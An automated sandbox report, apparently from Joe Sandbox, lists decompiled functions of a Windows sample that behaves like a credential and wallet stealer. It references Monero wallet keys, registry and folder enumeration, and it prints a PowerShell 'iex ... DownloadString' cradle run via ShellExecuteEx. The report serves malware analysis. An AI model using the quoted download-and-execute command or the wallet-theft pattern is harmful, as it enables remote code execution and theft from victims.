                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 2f1446eceadf5aa15e162f78ff9c4dd4ebe569d0900973561486df79f10c51b9
                                • Instruction ID: ad963aaebd6df21e0fe7ffbb88a67fed910970197b3cd44bccd37ef19562b586
                                • Opcode Fuzzy Hash: 2f1446eceadf5aa15e162f78ff9c4dd4ebe569d0900973561486df79f10c51b9
                                • Instruction Fuzzy Hash: EB3105B4A0020DEFDB14DFA4C996FAEB7B9FF48304F148158E911A7290D774AA41CFA1
                                Function 00D94780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,0182E150), ref: 00D947DB
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94801
                                • lstrcat.KERNEL32(?,?), ref: 00D94820
                                • lstrcat.KERNEL32(?,?), ref: 00D94834
                                • lstrcat.KERNEL32(?,0181BA90), ref: 00D94847
                                • lstrcat.KERNEL32(?,?), ref: 00D9485B
                                • lstrcat.KERNEL32(?,0182D8E0), ref: 00D9486F
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D98D90: GetFileAttributesA.KERNEL32(00000000,?,00D81B54,?,?,00DA564C,?,?,00DA0E1F), ref: 00D98D9F
                                  • Part of subcall function 00D94570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D94580
                                  • Part of subcall function 00D94570: RtlAllocateHeap.NTDLL(00000000), ref: 00D94587
                                  • Part of subcall function 00D94570: wsprintfA.USER32 ref: 00D945A6
                                  • Part of subcall function 00D94570: FindFirstFileA.KERNEL32(?,?), ref: 00D945BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: e1744eac7be3ee4a7023bac9374bc4a3e2fc948e68c19fb61983f15822361a52
                                • Instruction ID: ed9c771238f56d93d3b349b28b7ab573c378298a7f53fb294d193f9d39d0cb7c
                                • Opcode Fuzzy Hash: e1744eac7be3ee4a7023bac9374bc4a3e2fc948e68c19fb61983f15822361a52
                                • Instruction Fuzzy Hash: 97315EB690021CABCB14FBA0DC86EE9737CAB58704F404589B31996081EE75A6899FB5
                                Function 00D92C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D92D85
                                Strings
                                • <, xrefs: 00D92D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D92D04
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D92CC4
                                • ')", xrefs: 00D92CB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 243fa3f8322fe44135887194ca1e3fbfee500e0af970502a97f1c0c07b5d2d61
                                • Instruction ID: 240cd50751a2e737755018fe407fec44675f6dc4a61f266418b9fa864317727f
                                • Opcode Fuzzy Hash: 243fa3f8322fe44135887194ca1e3fbfee500e0af970502a97f1c0c07b5d2d61
                                • Instruction Fuzzy Hash: D741BD72C10218AADF14EBA4C892BEDBB78EF14300F504119F116A7191DF746A4ACFF6
                                Function 00D89E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00D89F41
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: b0cb57f19b044ba526febc9d83f78cabe884efee1f23cd77577c9e6f2d3f5a82
                                • Instruction ID: c801ee337f74abc9cabf43d70533e4f02bcdb9b00c895878546b27293f2da6fb
                                • Opcode Fuzzy Hash: b0cb57f19b044ba526febc9d83f78cabe884efee1f23cd77577c9e6f2d3f5a82
                                • Instruction Fuzzy Hash: 4B611D75A102489FDF14EFA8CC96BED77B5EF45300F048018F9095B595EB746A0ACBB2
                                Function 00D940B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0182D900,00000000,00020119,?), ref: 00D940F4
                                • RegQueryValueExA.ADVAPI32(?,0182E2B8,00000000,00000000,00000000,000000FF), ref: 00D94118
                                • RegCloseKey.ADVAPI32(?), ref: 00D94122
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94147
                                • lstrcat.KERNEL32(?,0182E270), ref: 00D9415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 83462e381caf1be3d3bd2d9c407207c73ca9b3167ff8a3aaae8c90f95a54eaf2
                                • Instruction ID: 85ab994f33782407c8a1781d32cd2850e139a5e1c0cc4a9e72b899c82ff1bb12
                                • Opcode Fuzzy Hash: 83462e381caf1be3d3bd2d9c407207c73ca9b3167ff8a3aaae8c90f95a54eaf2
                                • Instruction Fuzzy Hash: 1C4153B690010C6BDB14EBA0ED57FFE737DEB88304F404558B61997181EA756B888BB2
                                Function 00D96920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00D9696C
                                • sscanf.NTDLL ref: 00D96999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D969B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D969C0
                                • ExitProcess.KERNEL32 ref: 00D969DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: b39a0002547cafb2f47bf3aaf386e09c46bb0714d47a8a8220f6bfb7225fb360
                                • Instruction ID: 726a9f089d1d1382e863df569dd7819a784c9a00017bcf0e8f814638b66dcb44
                                • Opcode Fuzzy Hash: b39a0002547cafb2f47bf3aaf386e09c46bb0714d47a8a8220f6bfb7225fb360
                                • Instruction Fuzzy Hash: E821CB75D1420CABCF04EFE8D9469EEB7B5FF48304F04852AE506E3250EB34A605DBA9
                                Function 00D97E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0181C470,00000000,00020119,?), ref: 00D97E5E
                                • RegQueryValueExA.ADVAPI32(?,0182D6E0,00000000,00000000,000000FF,000000FF), ref: 00D97E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00D97E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 011a94472a30d3ab8d9faeb8bed50da7a8f097046eca52bb6db5ac88ce745348
                                • Instruction ID: 8b158d1e8e411b06683d82b857fb60ff2aba746732a03515a9815a419a4e17f9
                                • Opcode Fuzzy Hash: 011a94472a30d3ab8d9faeb8bed50da7a8f097046eca52bb6db5ac88ce745348
                                • Instruction Fuzzy Hash: B41151B1A4420DEBDB04CF95DE4AFBBBBB8FB44B14F104159F615A7280D77468009BA1
                                Function 00D99260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(0182E0A8,?,?,?,00D9140C,?,0182E0A8,00000000), ref: 00D9926C
                                • lstrcpyn.KERNEL32(00FCAB88,0182E0A8,0182E0A8,?,00D9140C,?,0182E0A8), ref: 00D99290
                                • lstrlen.KERNEL32(?,?,00D9140C,?,0182E0A8), ref: 00D992A7
                                • wsprintfA.USER32 ref: 00D992C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 34d66c7b63cb054b5be6a60f338ce02a2e5891d3fcc6f06422fa76a2df07fdee
                                • Instruction ID: ba23eb4572e952c6b91f46afb1aa0bfdd6351a77fc0b2a16678d679b5766b390
                                • Opcode Fuzzy Hash: 34d66c7b63cb054b5be6a60f338ce02a2e5891d3fcc6f06422fa76a2df07fdee
                                • Instruction Fuzzy Hash: B301ED7550010CFFCB04DFECCA59EAD7BB9EB44354F148188F90997241C631AE54EBA5
                                Function 00D812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D812B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D812BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D812D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D812F5
                                • RegCloseKey.ADVAPI32(?), ref: 00D812FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 3f215309666fa47f65aae465b92ee5509954207f447a0f53eb32cab17273b5fd
                                • Instruction ID: d65171232e60c42036756037b1c552681bc5330eb0262e0264f75901b8fe5a2f
                                • Opcode Fuzzy Hash: 3f215309666fa47f65aae465b92ee5509954207f447a0f53eb32cab17273b5fd
                                • Instruction Fuzzy Hash: 4D011DB9A4020CBBDB00DFE0DD4AFAEB7B8EB48705F008159FA0597280D670AA019B51
                                Function 00D9C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: c98812588727217b6014200a0123055f1aec2a8316b6f6b98b7e6429a67be600
                                • Instruction ID: b28f8e154a0d7075436feb24fc90b44a54ffe3e507c06a37dc66bba406321f5f
                                • Opcode Fuzzy Hash: c98812588727217b6014200a0123055f1aec2a8316b6f6b98b7e6429a67be600
                                • Instruction Fuzzy Hash: 8B4116B111079C6EDF218B248C94FFBBBE89B05705F1844E8E9CA87182E2719A44CF30
                                Function 00D96630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D96663
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D96726
                                • ExitProcess.KERNEL32 ref: 00D96755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
